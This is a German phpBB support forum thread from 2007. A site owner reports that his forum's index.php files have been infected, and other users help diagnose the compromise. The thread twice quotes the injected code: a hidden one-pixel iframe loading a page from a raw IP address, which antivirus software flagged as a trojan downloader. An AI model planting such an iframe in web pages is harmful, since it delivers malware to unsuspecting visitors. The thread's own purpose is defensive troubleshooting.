Dateigröße der index.php

darkwave · Beitrag von **darkwave** » 14.06.2007 18:27

Meine Frage geht dahin, ob die "index.php" nach der Installation etwas größer ist als in der gepackten uninstallierten Version.

Die Datei in dem zip File ist 4931 kb groß und nach der Installierung ist sie jetzt bei mir 5169 kb groß.

Außerdem ist in der "index.php" in der installierten Version folgende Zeile enthalten am Ende des Quelltextes.

Code: Alles auswählen

<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Dazu kommt bei mir jedesmal, wenn ich mein Forum aufrufe eine Meldung von Kaspersky Antivirus und meldet mir folgendes:

Code: Alles auswählen

Trojan-Downloader.JS.Agent.ep

The Ripper · Beitrag von **The Ripper** » 14.06.2007 18:33

von wo hast du denn die datei gedownloadet??
meine ist 5kb groß. bist du dir sicher das du dich nicht verschaut hast?

Code: Alles auswählen

<iframe src='http://81.95.149.26/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

diese zeile ist bei mir nicht vorhanden, allerdings die virus meldung erscheint bei mir (auch kaspersky) auch.

Modest · Beitrag von **Modest** » 14.06.2007 19:05

ich glaube du meinst Bytes und nicht kilobytes

Beitrag von **Dr.Death** » 14.06.2007 20:07

Mal bitte hier vorbei schauen:
http://www.phpbb.de/viewtopic.php?p=876335#876335

Du hast Dir warscheinlich einen Virus / Trojaner zugelegt.

darkwave · Beitrag von **darkwave** » 14.06.2007 22:18

Modest hat geschrieben:ich glaube du meinst Bytes und nicht kilobytes

ja natürlich meinte ich bytes und nicht KB - ist auf die schnelle schief gegangen

.

danke für die Tipps

darkwave · Beitrag von **darkwave** » 15.06.2007 10:40

Eine ähnliche Zeile, wie oben schon mal angegeben, war heute wieder bei mir im Forum. Die Zeile wird immer in die index.php im Rootverzeichnis geschrieben und in die index.php im adm-Verzeichnis.

In wie weit nur mein Forum betroffen ist kann ich nicht sagen, aber es gibt noch einen interessanten Beitrag zu einem Virusproblem. http://www.viruslist.com/de/news?id=201611620.

darkwave · Beitrag von **darkwave** » 15.06.2007 12:33

Ich möchte nur noch einmal darauf hinweisen, dass die Zeile in dem etwas weiter oben angeführten Code-Bereich in meinem Forum in fast jeder "index" Datei zu finden war. Das sind die "index.php" im Root und "adm" Ordner, sowie die "index.htm" Files in fast jedem Ordner der eine Ebene unter dem Root liegt. Desweiteren war die Zeile in den beiden "auth.php" Files enthalten im "includes" Verzeichnis, sowie im "includes/acp" Verzeichnis.

larsneo · Beitrag von **larsneo** » 15.06.2007 15:26

ergo hast du ein ernsthaftes sicherheitsproblem - entweder aufgrund der eingesetzten software und/oder aufgrund einer schlechten serverkonfiguration.
- was für software setzt du auf dem webspace ein?
- kontrolliere mal das server-enviroment mit phpsecinfo
- überprüfe mal die logfiles auf verdächtige zugriffe (aka remote code injection, remote code upload etc)